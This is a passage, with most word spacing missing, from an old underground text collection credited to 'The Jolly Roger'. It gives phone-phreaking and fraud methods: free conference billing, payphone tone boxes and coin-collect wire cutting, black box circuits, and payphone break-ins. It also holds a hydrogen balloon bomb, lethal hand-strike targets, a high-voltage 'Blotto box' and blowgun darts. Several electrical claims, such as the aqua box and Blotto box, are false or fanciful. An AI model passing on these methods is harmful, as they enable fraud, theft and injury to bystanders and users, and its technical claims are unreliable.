switchboardandtheconferenceshallbebilledthere.SinceBlueBoxingissuch alargetopic,thisisasfarasIwillgointoit'suses. Billingtoaloop: Athirdmethodofreceivingafreeconferenceisbybillingouttoaloop.A loopis2numbersthatwhentwopeoplecall,theycantalktoeachother.You're sayingwoopteedoright?Wrong!Loopscanbeusefultophreaks.First,dial alliancedirect.Aftergoingthroughthebeginningprocedure,whichwillbe discussedlaterinthistutorial,dial0andwaitforanAllianceoperator.When sheanswerstellheryouwouldliketobilltheconferencetosuchandsucha number.(Aloopwhereyourphriendisontheotherside)Shewillthencallthat numbertoreceivevoiceverification.Ofcourseyourphriendwillbewaitingand willacceptthecharges.Thus,theconferenceisbilledtotheloop. Billingtocallforwarding: Whenyoudialanumberthatiscallforwarded,itisfirstansweredbythe originallocation,thenforwarded.Theoriginallocationwillhangupif2600hz isreceivedfromonlyoneendoftheline.Therefore,ifyouweretowaitafter theforwardedresidenceanswered,youwouldreceivetheoriginallocation'sdial tone. Example: Dial8003254067 Theoriginalresidencewouldanswer,thenforwardthecall,asecondtypeof

ringingwouldbeheard.Whenthissecondresidenceanswerssimplywaituntil theyhangup.Afterabouttwentysecondsyouwillthenreceivetheoriginal residence'sdialtonesinceitheard2600hzfromoneendoftheline.Simply dialAlliancefromthispointandtheconferencewillbebilledtotheoriginal residence.Thesearethefourmainwaystoreceiveafreeconference.Iamsure manymoreexist,butthesefourarequitehandythemselves. LogonProcedure: OnceAllianceanswersyouwillhearatwotonecombination.Thisistheirwayof saying'Howmanypeopledoyouwantontheconferencedude?'Simplytypeina2 digitcombination,dependingonwhatbridgeofAllianceyouareon,between10 and59.Afterthiseitherhit'*'tocanceltheconferencesizeandinput anotherorhit'#'tocontinue.YouarenowinAllianceTeleconferencingandare onlysecondsawayfromhavingyourownroaringconferencegoingstrong!!! DialinginConferees: Todialyourfirstconferee,dial1+npa+pre+suffandawaithis/heranswer. npa=areacode pre=prefix suff=suffix Ifthenumberisbusy,orifnooneanswerssimplyhit'*'andyourcallwillbe aborted.But,iftheydoanswer,hitthe'#'key.Thiswilladdthemtothe conference.Nowcommencedialingotherconferees. JoiningYourConference: Tojoinyourconferencefromcontrolmodesimplyhitthe'#'key.Withina secondortwoyouwillbechattingwithallyourbuddies.Togobackinto controlmode,simplyhitthe'#'keyagain. TransferringControl: Totransfercontroltoanotherconferee,gointocontrolmode,hitthe# 6+1+npa+pre+suffoftheconfereeyouwishtogivecontrolto.Ifafter,youwish toabortthistransferhitthe'*'key. NOTE:Transferofcontrolisoftennotavailable.Whenyoureceiveamessage statingthis,yousimplycannottransfercontrol. MutedConferences: Torequestamutedconferencesimplyhitthe9key.Iamnotexactlysurewhata mutedconferenceisbutitisprobablyawaytokeepunwantedeavesdroppersfrom listeningin. DialingAllianceOperators: Simplydial0asyouwouldfromanyfoneandwaitfortheoperatortoanswer. EndingYourConference: Toendyourconferencealltogether,thatiskickeveryoneincludingyourself off,gointocontrolmodeandhit'*'...afterafewsecondssimplyhangup.Your conferenceisover. AreAllianceOperatorsDangerous? No.Notintheleast.Theworsttheycandotoyouwhileyouarehavinga conferenceisdropallconfereesincludingyourself.Thisisinnowayharmful, justalittleaggravating. AllianceandTracing: Alliancecantrace,asallcitizensoftheUnitedStatescan.Butthishasto allbepremeditatedandAT&Thastobecalledandit'sreallyalargehassle, therefore,itisalmostneverdone.Alliancesimplydoesnotwantitknownthat teenagersarephuckingthemover.TheonlysortofsafetyequipmentAlliancehas

onlineisasimplepenregister.Thislittledevicesimplyrecordsallthe numbersoftheconfereesdialed.Nobigdeal.AllAlliancecandoiscallup thatpersonsnumber,threatenandquestion.However,legally,theycando nothingbecauseallyoudidwasansweryourfone. NOTE:AlmostallinstructionsaretoldtothepersonincommandbyAlliance recordings.Alotofthistutorialisjustalistingofthosecommandsplus informationgatheredbyeithermyselforthephellowphreaksoftheworld!!! 38.AquaBoxPlansbyTheJollyRoger EverytruephreakerlivesinfearofthedreadedFBI'LockInTrace'.Foralong time,itwasimpossibletoescapefromtheLockInTrace.Thisboxdoesofferan escaperoutewithsimpledirectionstoit.Thisboxisquiteasimpleconcept, andalmostanyphreakerwithbasicelectronicsknowledgecanconstructanduse it. TheLockInTrace AlockintraceisadeviceusedbytheFBItolockintothephoneusers locationsothathecannothangupwhileatraceisinprogress.Forthoseof youwhoarenotfamiliarwiththeconceptof'lockingin',thenhere'sabrief description.TheFBIcantapintoaconversation,sortoflikeathreewaycall connection.Then,whentheygetthere,theycanplugelectricityintothephone line.Allphoneconnectionsareheldopenbyacertainvoltageofelectricity. Thatiswhyyousometimesgetstaticandfaintconnectionswhenyouarecalling faraway,becausetheelectricityhastroublekeepingthelineup.Whatthelock intracedoesiscutintothelineandgeneratethatsamevoltagestraightinto thelines.Thatway,whenyoutryandhangup,voltageisretained.Yourphone willringjustlikesomeonewascallingyouevenafteryouhangup.(Ifyouhave callwaiting,youshouldunderstandbetteraboutthat,forcallwaiting interceptstheelectricityandmakesatonethatmeanssomeoneisgoingthrough yourline.Then,itisamatterofwhichvoltageishigher.Whenyoupushdown thereceiver,thenitseesawstheelectricitytotheotherside.Whenyouhave apersononeachlineitisimpossibletohangupunlessoneorbothofthem willhangup.Ifyoutrytohangup,voltageisretained,andyourphonewill ring.Thatshouldgiveyouanunderstandingofhowcallingworks.Also,when electricitypassesthroughacertainpointonyourphone,theelectricitycauses abelltoring,oronsomenewerphonesanelectronicringtosound.)So,in ordertoeliminatethetrace,yousomehowmustlowerthevoltagelevelonyour phoneline.Youshouldknowthateverytimesomeoneelsepicksupthephone line,thenthevoltagedoesdecreasealittle.Inthefirststepsofplanning thisout,Xeroxsuggestedgettingaboutahundredphonesallhookedintothe samelinethatcouldallbetakenoffthehookatthesametime.Thatwould greatlydecreasethevoltagelevel.Thatisalsowhymostthreewayconnections thatareusingthebellservicethreewaycalling(whichisonly$3amonth) becomequitefaintafterawhile.Bynow,youshouldunderstandthebasicidea. Youhavetodrainallofthepoweroutofthelinesothevoltagecannotbe keptup.RathersuddendrainingofpowercouldquicklyshortouttheFBIvoltage machine,becauseitwasonlybuilttosustaintheexactvoltagenecessaryto keepthevoltageout.Fornow,imaginethis.OneofthenormalRadioShack generatorsthatyoucangopickupthatoneendofthecordthathooksintothe centralboxhasaphonejackonitandtheotherhasanelectricalplug.This way,youcan"flash"voltagethroughtheline,butcannotdrainit.So,some modificationshavetobedone. Materials ABEOC(BasicElectricalOutputSocket),likeasmalllamptypeconnection, whereyoujusthaveasimpleplugandwirethatwouldplugintoalightbulb. Oneofcordsmentionedabove,ifyoucan'tfindonethenconstructyourown... Samevoltageconnection,buttherestrainermustbebuiltin(I.E.Thecentral box)Twophonejacks(oneforthemodem,oneforifyouarebeingtracedtoplug

theaquaboxinto)Somecreativityandeasywork. Notice:Nophoneshavetobedestroyed/modifiedtomakethisbox,sodon'tgo outandbuyanewphoneforit! Procedure Allright,thisisaverysimpleprocedure.IfyouhavetheBEOC,itcoulddrain intoanything:aradio,orwhatever.Thepurposeofhavingthatisyouaregoing tosuckthevoltageoutfromthephonelineintotheelectricalapplianceso therewouldbenovoltagelefttolockyouinwith. 1. Taketheconnectioncord.Examinetheplugattheend.Itshouldhaveonly twoprongs.Ifithasthree,still,donotfear.Makesuretheelectrical applianceisturnedoffunlessyouwanttobecomeacrispycritterwhilemaking thisthing.Mostplugswillhaveahardplasticdesignonthetopofthemto preventyoufromgettinginattheelectricalwiresinside.Well,removeit.If youwanttokeeptheplug(Idon'tseewhy...)thenjustcutthetopoff.When youlookinside,LowandBehold,youwillseethatatthebaseoftheprongs thereareafewwiresconnectingin.Thosewiresconductthepowerintothe appliance.So,youcarefullyunwrapthosefromthesidesandpullthemoutuntil theyareaboutaninchaheadoftheprongs.Ifyoudon'twanttokeepthejack, thenjustriptheprongsout.Ifyouare,covertheprongswithinsulationtape sotheywillnotconnectwiththewireswhenthepowerisbeingdrainedfromthe line. 2. Dothesamethingwiththeprongsontheotherplug,soyouhavethewires evenlyconnected.Now,wraptheendofthewiresaroundeachother.Ifyou happentohavetheotherendofthevoltagecordhookedintothephone,stop readingnow,you'retoofuckingstupidtocontinue.Afteryou'vewrappedthe wiresaroundeachother,thencoverthewholethingwiththeplugswith insulatingtape.Then,ifyoubuiltyourowncontrolboxorifyouboughtone, thencramallthewiresintoitandrecloseit.Thatboxisyourticketoutof this. 3. Recheckeverythingtomakesureit'sallinplace.Thisisapretty flimsyconnection,butonlatermodelswhenyougetmoreexperiencedatitthen youcansolderawayatitandformthewholedeviceintoonebigbox,withsome kindofcheapMattelhandheldgameinsidetobethepowerconnector.Inorder touseit,justkeepthisboxhandy.Plugitintothejackifyouwant,butit willslightlylowerthevoltagesoitisn'tconnected.Whenyouplugitin,if youseesparks,unplugitandrestartthewholething.Butifitjustseemsfine thenleaveit. Use Now,soyouhavethewholethingpluggedinandall...Donotusethisunless thesituationisdesperate!Whenthetracehasgoneon,don'tpanic,unplugyour phone,andturnontheappliancethatitwashookedto.Itwillneedenergyto turnitselfon,andhere'sagreatsource...Thevoltagetokeepaphoneline openisprettysmallandasimplelightbulbshoulddrainitallinandprobably shorttheFBIcomputeratthesametime. 39.HindenbergBombbyTheJollyRoger Needed: 1Balloon 1Bottle 1LiquidPlumber 1PieceAluminumfoil 1LengthFuse

Fillthebottle3/4fullwithLiquidPlumberandaddalittlepieceofaluminum foiltoit.Puttheballoonovertheneckofthebottleuntiltheballoonis fulloftheresultinggas.Thisishighlyflammablehydrogen.Nowtiethe balloon.Nowlightthefuse,andletitrise.Whenthefusecontactsthe balloon,watchout!!! 40.HowtoKillSomeonewithyourBareHandsbyTheJollyRoger Thisfilewillexplainthebasicsofhandtohandcombat,andwilltellofthe bestplacestostrikeandkillanenemy.Whenengagedinhandtohandcombat, yourlifeisalwaysatstake.Thereisonlyonepurposeincombat,andthatis tokillyourenemy.Neverfaceanenemywiththeideaofknockinghimout.The chancesareextremelygoodthathewillkillYOUinstead.Whenaweaponisnot available,onemustresorttothefulluseofhisnaturalweapons.Thenatural weaponsare: 1. 2. 3. 4. 5. 6. 7. 8. Theknifeedgeofyourhands. Fingersfoldedatthesecondjointorknuckle. Theprotrudingknuckleofyoursecondfinger. Theheelofyourhand. Yourboot Elbows Knees YourTeeth.

Attackingisaprimaryfactor.Afightwasneverwonbydefensiveaction.Attack withallofyourstrength.Atanypointoranysituation,somevulnerablepoint onyourenemiesbodywillbeopenforattack.Dothiswhilescreamingas screaminghastwopurposes. 1. Tofrightenandconfuseyourenemy. 2. Toallowyoutotakeadeepbreathwhich,inturn,willputmoreoxygenin yourbloodstream. Yourbalanceandbalanceofyourenemyaretwoimportantfactors;since,ifyou succeedinmakingyourenemylosehisbalance,thechancesareninetoonethat youcankillhiminyournextmove.Thebestoverallstanceiswhereyourfeet arespreadaboutshoulderswidthapart,withyourrightfootaboutafootahead oftheleft.Botharmsshouldbebentattheelbowsparalleltoeachother. Standontheballsofyourfeetandbendyourwaistslightly.Kindoflikea boxer'scrouch.Employingasuddenmovementorascreamoryellcanthrowyour enemyoffbalance.Therearemanyvulnerablepointsofthebody.Wewillcover themnow: Eyes:UseyourfingersinaVshapeandattackingougingmotion. Nose:(Extremelyvulnerable)Strikewiththeknifeedgeofthehandalongthe bridge,whichwillcausebreakage,sharppain,temporaryblindness,andifthe blowishardenough,death.Also,deliverablowwiththeheelofyourhandin anupwardmotion,thiswillshovetheboneupintothebraincausingdeath. Adam'sApple:Thisspotisusuallyprettywellprotected,butifyougetthe chance,strikehardwiththeknifeedgeofyourhand.Thisshouldseverthe windpipe,andthenit'salloverinamatterofminutes. Temple:Thereisalargearteryuphere,andifyouhitithardenough,itwill causedeath.Ifyoumanagetoknockyourenemydown,kickhiminthetemple,and he'llnevergetupagain. BackoftheNeck:Arabbitpunch,orblowdeliveredtothebaseoftheneckcan easilybreakit,buttobesafe,itisbettertousethebuttofagunorsome

otherheavybluntobject. Upperlip:Alargenetworkofnervesarelocated.Thesenervesareextremely closetotheskin.Asharpupwardblowwillcauseextremepain,and unconsciousness. Ears:Comingupfrombehindanenemyandcuppingthehandsinaclappingmotion overthevictimsearscankillhimimmediately.Thevibrationscausedfromthe clappingmotionwillbursthiseardrums,andcauseinternalbleedinginthe brain. Groin:AVERYvulnerablespot.Ifleftopen,getitwithkneehard,andhe'll buckleoververyfast. Kidneys:Alargenervethatbranchesofftothespinalcordcomesverycloseto theskinatthekidneys.Adirectblowwiththeknifeedgeofyourhandcan causedeath. Therearemanymorewaystokillandinjureanenemy,buttheseshouldworkbest fortheaverageperson.ThisismeantonlyasinformationandIwouldnot recommendthatyouusethisforasimpleHighSchoolBrawl.Usethesemethods only,inyouropinion,ifyourlifeisindanger.Anyoneofthesemethodscould veryeasilykillorcausepermanentdamagetosomeone.Onemorewordofcaution, youshouldpracticethesemovesbeforeusingthemonadummy,oramockbattle withafriend.(Youdon'thavetoactuallyhithimtopractice,justworkon accuracy.) 41.PhoneSystemsTutorialIIIbyTheJollyRoger Preface: ThisarticlewillfocusprimarilyonthestandardwesternelectricsingleSlot cointelephone(akafortressfone)whichcanbedividedinto3types: dialtonefirst(dtf) coinfirst(cf):(i.e.,itwantsyour$beforeyoureceiveadialtone) dialpostpayservice(pp):youpayafterthepartyanswers

Depositingcoins(slugs): Onceyouhavedepositedyourslugintoafortress,itissubjectedtoaGamutof tests.Thefirstobstacleforaslugisthemagnetictrap.Thiswillstopany lightweightmagneticslugsandcoins.Ifitpassesthis,theslugisthen classifiedasanickel,dime,orQuarter.Eachslugisthencheckedfor appropriatesizeandweight.IfThesetestsarepassed,itwillthentravel throughanickel,dime,orquarterMagnetasappropriate.Thesemagnetssetup aneddycurrenteffectwhichCausescoinsoftheappropriatecharacteristicsto slowdownsotheyWillfollowthecorrecttrajectory.Ifallgoeswell,thecoin willfollowtheCorrectpath(suchasbouncingoffofthenickelanvil)whereit willHopefullyfallintothenarrowacceptedcoinchannel.Theratherelaborate teststhatareperformedasthecointravelsdowntheCoinchutewillstopmost slugsandotherundesirablecoins,suchasPennies,whichmustthenberetrieved usingthecoinreleaselever.Iftheslugmiraculouslysurvivesthegamut,it willthenstriketheAppropriatetotalizerarmcausingaratchetwheeltorotate onceforevery5centincrement(e.g.,aquarterwillcauseittorotate5 times).Thetotalizerthencausesthecoinsignaloscillatortoreadoutadual frequencysignalindicatingthevaluedepositedtoacts(acomputer)ortheTsps operator.Thesearethesametonesusedbyphreaksintheinfamousredboxes. Foraquarter,5beeptonesareoutpulsedat1217pulsespersecond(pps).A dimecauses2beeptonesat58ppswhileanickelcausesonebeeptoneat5 8pps.Abeepconsistsof2tones:2200+1700hz.Arelayinthefortress calledthe"BRelay"(yes,thereisalsoan'arelay')placesacapacitoracross thespeechcircuitduringtotalizerreadouttopreventthe"customer"from hearingtheredboxtones.Inolder3slotphones:onebell(10501100hz)fora

nickel,twobellsforadime,andonegong(800hz)foraquarterareused insteadofthemoderndualfrequencytones. TSPS&ACTS Whilefortressesareconnectedtothecoofthearea,alltransactionsare handledviathetrafficservicepositionsystem(tsps).Inareasthatdonot haveacts,allcallsthatrequireoperatorassistance,suchascallingcardand collect,areautomaticallyroutedtoatspsoperatorposition.Inaneffortto automatefortressservice,acomputersystemknownasautomatedcointoll service(acts)hasbeenimplementedinmanyareas.Actslistenstotheredbox signalsfromthefonesandtakesappropriateaction.Itisactswhichsays,"two dollarsplease(pause)pleasedeposittwodollarsforthenexttenseconds"(and othervariations).Also,ifyoutalkformorethanthreeminutesandthenhang up,actswillcallbackanddemandyourmoney.Actsisalsoresponsiblefor automatedcallingcardservice.Actsalsoprovidetroublediagnosisfor craftspeople(repairmenspecializinginfortresses).Forexample,thereisa cointestwhichisgreatfortuningupredboxes.Inmanyareasthistestcanbe activatedbydialing09591230atafortress(thankstokarlmarxforthis information).Onceactivateditwillrequestthatyoudepositvariouscoins.It willthenidentifythecoinandoutpulsetheappropriateredboxsignal.The coinsareusuallyreturnedwhenyouhangup.Tomakesurethatthereisactually moneyinthefone,thecoinitiatesa"groundtest"atvarioustimesto determineifacoinisactuallyinthefone.Thisiswhyyoumustdepositat leastanickelinordertousearedbox! GreenBoxes: Payingtheinitialrateinordertousearedbox(oncertainfortresses)lefta sourtasteinmanyredboxer'smouthsthusthegreenboxwasinvented.Thegreen boxgeneratesusefultonessuchascoincollect,coinreturn,andringback. ThesearethetonesthatactsorthetspsoperatorwouldsendtoThecowhen appropriate.Unfortunately,thegreenboxcannotbeusedatafortressstation butitmustbeusedbythecalledparty. Herearethetones: CoinCollect 700+1100Hz CoinReturn 1100+1700Hz Ringback 700+1700Hz Beforethecalledpartysendsanyofthesetones,anoperatorreleasedsignal shouldbesenttoalerttheMFdetectorsattheco.Thiscanbeaccomplishedby sending900+1500hzorasingle2600hzwink(90ms)followedbya60msgap andthentheappropriatesignalforatleast900Ms. Also,donotforgetthattheinitialrateiscollectedshortlybeforethe3 minuteperiodisup.Incidentally,oncetheaboveMFtonesforcollectingand returningcoinsreachtheco,theyareconvertedintoanappropriatedcpulse (130voltsforreturn&+130voltsforcollect).Thispulseisthensentdown thetiptothefortress.Thiscausesthecoinrelaytoeitherreturnorcollect thecoins.Thealleged"tnetwork"takesadvantageofthisinformation.Whena pulseforcoincollect(+130vdc)issentdowntheline,itmustbegrounded somewhere.Thisisusuallyeithertheyelloworblackwire.Thus,ifthewires areexposed,thesewirescanbecuttopreventthepulsefrombeinggrounded. Whenthethreeminuteinitialperiodisalmostup,makesurethattheblack& yellowwiresaresevered;thenhangup,waitabout15secondsincaseofa secondpulse,reconnectthewires,pickupthefone,hangupagain,andifall goeswellitshouldbe"jackpot"time. PhysicalAttack: Atypicalfortressweighsroughly50lbs.Withanemptycoinbox.Mostofthis isaccountedforinthearmorplating.Whyallthesecurity?Well,Bell contributesittothefollowing:"socialchangesduringthe1960'smadethe multislotcoinstationaprimetargetfor:vandalism,strongarmrobbery,fraud,

andtheftofservice.Thisbroughtabouttheintroductionofthemorerugged singleslotcoinstationandanewenvironmentforcoinservice."Asforpicking thelock,IwillquoteMr.Phelps:"Weoftenfantasizeabout'pickingthelock' or'gettingamasterkey.'Well,youcanforgetaboutit.Idon'tliketo discouragepeople,butitwillsaveyoufromwastingalotofourtimetime whichcanbeputtobetteruse(heh,heh)."Asforphysicalattack,thecoin plateissecuredonallfoursidebyhardenedsteelboltswhichpassthroughtwo slotseach.Theseboltsareinturninterlockedbythemainlock.OnephreakI knowdidmanagetotakeoneofthe'mothers'home(whichwasattachedtoapiece ofplywoodataconstructionsite;otherwise,thepermanentonesareabitchto detachfromthewall!).Ittookhimalmosttenhourstoopenthecoinboxusing apowerdrill,sledgehammers,andcrowbars(whichwasemptyperhapsnext time,hewilldepositacoinfirsttohearifitslushesdownnicelyorhitsthe emptybottomwithaclunk.) Takingthefoneoffersahighermarginofsuccess.Althoughthismaybe difficultoftenrequiringbruteforceandtherehasbeenseveralcasesofback axlesbeinglosttryingtotakedownafone!Aquickanddirtywaytoopenthe coinboxisbyusingashotgun.InDetroit,afterecologistscleanedouta municipalpond,theyfound168coinphonesrifled.Incolderareas,suchas Canada,someshrewdpeopletapeupthefonesusingducttape,pourinwater,and comebackthenextdaywhenthewaterwillhavefrozethusexpandingand crackingthefoneopen.Inonecase,"unauthorizedcoincollectors"wherecaught whentheybrought$6,000inchangetoabankandthebankbecamesuspicious... Atanyrate,themainlockisaneightleveltumblerlocatedontherightside ofthecoinbox.Thislockhas390,625possiblepositions(5^8,sincethere are8tumblerseachwith5possiblepositions)thusitishighlypickresistant! Thelockisheldinplaceby4screws.Ifthereissufficientclearancetothe rightofthefone,itisconceivabletopunchoutthescrewsusingthedrilling patternbelow(providedbyAlexanderMuddyintap#32): !!^ !!! !13/16"!!! !<>!!1" ! !!!!!! !(+)(+)! !!!!^ !!!!!! !!(Z)!!!! !!!!!23/16" !!!!! !(+)(+)!! !!!!! !! !! (Z)KEYHOLE(+)SCREWS !! Afterthisisaccomplished,thelockcanbepushedbackwardsdisengagingthe lockfromthecoverplate.Thefourboltsofthecoverplatecanthenbe retractedbyturningtheboltworkswithasimplekeyintheshapeofthehole onthecoinplate(seediagrambelow).Ofcourse,thereareothermethodsand drillingpatterns. _ !! () !_! [ROUGHLY]

DIAGRAMOFCOVERPLATEKEYHOLE Thetopcoverusesasimilar,butnotasstronglockingmethodwiththekeyhole depictedaboveonthetoplefthideandaregularlock(probablytumbleralso) onthetoprighthandside.Itisinterestingtoexperimentwiththecoinchute andthefortressesown"redbox"whichbelldidn'thavetheballstocolorred. Miscellaneous: Inafewareas(rural&Canada),postpayserviceexists.Withthistypeof service,themouthpieceiscutoffuntilthecallerdepositsmoneywhenthe calledpartyanswers.Thisalsoallowsforfreecallstoweatherandotherdial itservices!Recently,2600magazineannouncedtheclearboxwhichconsistsofa telephonepickupcoilandasmallamp.Itisbasedontheprincipalthatthe receiverisalsoaweaktransmitterandthatbyamplifyingyoursignalyoucan talkviathetransmitterthusavoidingcostlytelephonecharges!Mostfortresses arefoundinthe9xxxarea.Underformerbellareas,theyusuallystartat98xx (rightbelowthe99xxofficialseries)andmovedownward. Sincetheline,notthefone,determineswhetherornotadepositmustbemade, dtf&chargeacallfonesmakegreatextensions!Finally,fortressfonesallow foranewhobbyinstructionplatecollecting.Allthatisrequiredisaflat headscrewdriverandapairofneedlenosepliers.Simplyusethescrewdriverto liftunderneaththeplatesothatyoucangrabitwiththepliersandyank downwards.Iwouldsuggestcoveringthetipsoftheplierswithelectricaltape topreventscratching.Tencentplatesaredefinitelybecominga"rarity!" Fortresssecurity: Whilealonelyfortressmayseemtheperfecttarget,beware!Thegestapohas beenknowntostakeoutfortressesforaslongas6yearsaccordingtothegrass rootsquarterly.Toavoidanyproblems,donotusethesamefonesrepeatedlyfor boxing,callingcards,&otherexperiments.TheTelcoknowshowmuchmoney shouldbeinthecoinboxandwhenitsnottheretheytendtogetperturbed (Read:PissedOff). 42.BlackBoxPlansbyTheJollyRoger Introduction: Atanygiventime,thevoltagerunningthroughyourphoneisabout20Volts. Whensomeonecallsyou,thisvoltagegoesupto48Voltsandringsthebell. Whenyouanswer,thevoltagegoesdowntoabout10Volts.Thephonecompanypays attentiontothis.Whenthevoltagedropsto10,theystartbillingtheperson whocalledyou. Function: TheBlackBoxkeepsthevoltagegoingthroughyourphoneat36Volts,sothatit neverreaches10Volts.Thephonecompanyisthusfooledintothinkingyounever answeredthephoneanddoesnotbillthecaller.However,afteraboutahalf hourthephonecompanywillgetsuspiciousanddisconnectyourlineforabout10 seconds. Materials: 11.8KWattResistor 11VLED 1SPSTSwitch

Procedure:

1. Openyourphonebylooseningthetwoscrewsonthebottomandliftingthe caseoff. 2. Thereshouldbethreewires:Red,Green,andYellow.We'llbeworkingwith theRedWire. 3. Connectthefollowinginparallel: TheResistorandLED. TheSPSTSwitch.

Inotherwords,youshouldendupwiththis: (RedWire) !/\/\/\O! (Line)!!(Phone) !_/_! /\/\/\=Resistor O=LED _/_=SPST Use: TheSPSTSwitchistheOn/OffSwitchoftheBlackBox.Whentheboxisoff,your phonebehavesnormally.Whentheboxisonandyourphonerings,theLED flashes.Whenyouanswer,theLEDstaysonandthevoltageiskeptat36V,so thecallingpartydoesn'tgetcharged.Whentheboxison,youwillnotgeta dialtoneandthuscannotmakecalls.Alsorememberthatcallsarelimitedto halfanhour. PSDuetonewFoneCompanyswitchingsystems&thelike,thismayormaynot workinyourarea.IfyouliveinBumfuckKentucky,thentrythisout.Imakeno guarantees!(Ineverdo...) 43.TheInfamousBlottoBox!!byTheJollyRoger (Ibetthatnoonehastheballstobuildthisone!) Finally,itishere!Whatwasfirstconceivedasajoketofooltheinnocent phreakersaroundAmericahasfinallybeenconceived!Well,foryoupeoplewho areunenlightenedabouttheBlottoBox,hereisabriefsummeryofalegend. TheBlottoBox ForyearsnoweverypiratehasdreamedoftheBlottoBox.Itwasatfirstmade asajoketomockmoreignorantpeopleintothinkingthatthefunctionofit actuallywaspossible.Well,ifyouareTheVoltageMaster,itispossible. OriginallyconceivedbyKingBlottoofmuchfame,theBlottoBoxisfinally availabletothepublic. NOTE:JollyRogercannotberesponsiblefortheinformationdisclosedinthe file!Thisfileisstrictlyforinformationalpurposesandshouldnotbe actuallybuiltandused!Usageofthiselectronicalimpulsemachinecouldhave thesevereresultslistedbelowandcouldresultinhighfederalprosecution! Again,ITAKENORESPONSIBILITY!Allright,nowthatthatisclearedup,hereis thebasisoftheboxandit'sfunction. TheBlottoBoxiseveryphreaksdream...youcouldholdAT&Tdownonitsknee's withthisdevice.Because,quitesimply,itcanturnoffthephonelines everywhere.Nothing.Blotto.Nocallswillbeallowedoutofanareacode,and nocallswillbeallowedin.Nocallscanbemadeinsideitforthatmatter.As longastheswitchingsystemstaysthesame,thisboxwillnotstopatamere areacode.Itwillstopatnothing.Theelectricalimpulsesthatemitfromthis boxwillopeneveryline.Everylinewillringandringandring...thevoltage

willneverbecutoffuntilthebox/generatorisstopped.Thisisno200volt job,here.WearetalkingGENERATOR.Everyphonelinewillcontinuetoring,and peopleclosetotheboxmaybeelectrocutediftheypickupthephone.But,the BlottoBoxcanbestoppedbymerelycuttingofthelineorgenerator.Ifthey arecutoffthennothingwillemitanylonger.Itwilltakeawhileforthebox tocalmbackdownagain,butthatismerelyasuperficialaftereffect.Once again:Constructionanduseofthisboxisnotadvised!TheBlottoBoxwill continueaslongasthereiselectricitytocontinuewith.OK,thatiswhatit does,now,herearesomeinterestingthingsforyoutodowithit... BlottoFunctions/Installing OnceyouhaveinstalledyourBlotto,thereisnoturningback.Thefollowingare theinstructionsforconstructionanduseofthisbox.Pleasereadandheedall warningsintheabovesectionbeforeyouattempttoconstructthisbox. Materials: AHondaportablegeneratororamainpoweroutletlikeinastadiumor somesuchplace. 400voltratedcouplerthatsplicesafemaleplugintoaphonelinejack. Ameterofvoltagetoattachtotheboxitself. Agreenbase(i.e.oneoftheniceboxesabout3'by4'thatyousee aroundinyourneighborhood.Theyarethemainswitchboardsandwouldbeamore effectivelinetostartwithoraregularphonejack(notyourown,andnotin yourareacode!) Asolderingironandmuchsolder. Aremotecontrolorlongwoodenpole. Now.Youmusthaveguessedtheconstructionfromthat.Ifnot,heregoes,Iwill explainindetail.TaketheHondaPortableGeneratorandalloftheotherlisted equipmentandgooutandhuntforagreenbase.Makesureitisoneonthe groundorhangingatheadlevelfromapole,notthehugeonesatthetopof telephonepoles.Openitupwithanythingconvenient,ifyouaretwofeeblethen fuck,don'ttrythis.Takealookinside...youarehuntingforcolor coordinatinglinesofgreenandred.Now,takeoutyourradioshackcordandrip themeterthingoff.Replaceitwiththevoltagemeterabout.Agoodlevelto setthevoltagetoisabout1000volts.Now,attachthevoltagemetertothe cordandsetthelimitforonethousand.Plugtheotherendofthecordintothe generator.Takethephonejackandsplicethejackpartoff.Openitupand matchtheredandgreenwireswiththeotherredandgreenwires. NOTE:Ifyoujusthadthegeneratoronandhavedonethisinthecorrectorder, youwillbeacrispycritter.Keepthegeneratoroffuntilyouplantostartit up.Now,solderthoselinestogethercarefully.Wrapducktapeorinsulation tapearoundallofthewires.Now,placetheremotecontrolrightontothe startupofthegenerator.Ifyouhavethelongpole,makesureitisverylong andstandbackasfarawayasyoucangetandreachthepoleover. NOTICE:Ifyouaregoingrightalongwiththiswithoutreadingthefilefirst, youstillrealizenowthatyourareacodeisabouttobecomenull!Then,getting back,twitchthepole/remotecontrolandrunforyourdamnlife.Anywhere,just getawayfromit.Itwillbegeneratingsomuchelectricitythatifyoustandto closeyouwillkillyourself.Thegeneratorwillsmoke,etc.butwillnotstop. Youarenowkillingyourareacode,becauseallofthatenergyisspreading throughallofthephonelinesaroundyouineverydirection. Haveaniceday! TheBlottoBox:Aftermath Well,thatistheplansforthemostdevastatingandultimatelydeadly boxevercreated.Myhatgoesoffto:KingBlotto(fortheoriginalidea).

44.BlowgunbyTheJollyRoger InthisarticleIshallattempttoexplaintheuseandmanufactureofapowerful blowgunandmakingdartsforthegun.Thepossessionoftheblowgundescribed inthisarticleISafelony.Sobecarefulwhereyouuseit.Idon'twanttoget youallbusted. Needed: 1. Severalstrandsofyarn(About2inchesapiece). 2. Aregularpencil. 3. A2inchlongneedle(hopefullywithabeadedhead.Ifnotobtainable, wraptapearoundendofneedle. 4. footpipe.(PVCorAluminum)Halfainchindiameter. Constructingthedart: 1. Carefullytwistandpullthemetalpart(Alongwitheraser)ofthepencil tillitcomesoff. 2. TakePinandstartputtingabout57Strandsofyarnonthepin.Thenpush themuptothetopofthepin.Butnotovertheheadofthepin(orthetape). 3. Pushpinthroughthehollowpartoftheheadwherethepencilwasbefore. 4. Thatshouldforanicelookingdart.(seeillustration) ##### >>>>>/#istheyarn >istheheadofthepencil isthepinitself /istheheadofthepin UsingtheDarts: 1. Nowtakethefinisheddartandinsertitinthetube(ifitistoosmall putonmoreyarn.) 2. Aimthetubeatadoor,wall,sister,ect. 3. Blowontheendofthepipe. 4. Sometimestheendofthepipemaybesharp.WhenthishappensIsuggest youwrapitwithsomeblackelectriciantape.Itshouldfeelalotbetter. 45.BrownBoxPlansbyTheJollyRoger Thisisafairlysimplemodthatcanbemadetoanyphone.Allitdoesisallow youtotakeanytwolinesinyourhouseandcreateapartyline.SofarIhave notheardofanyonewhohasanyproblemswithit.Thereisonethingthatyou willnoticewhenyouareoneofthetwopeoplewhoiscalledbyapersonwitha brownbox.Theotherpersonwillsoundalittlebitfaint.Icouldovercomethis withsomeamplifiersbutthentherewouldn'tbeverymanyofthesemade[Why not?].Ithinktheconvenienceofhavingtwopeopleonthelineatoncewill makeupforanyminorvolumeloss. Hereisthediagram: KEY:___________________________________ |PART|SYMBOL| || |BLACKWIRE|*| |YELLOWWIRE|=| |REDWIRE|+| |GREENWIRE|| |SPDTSWITCH|_/_| 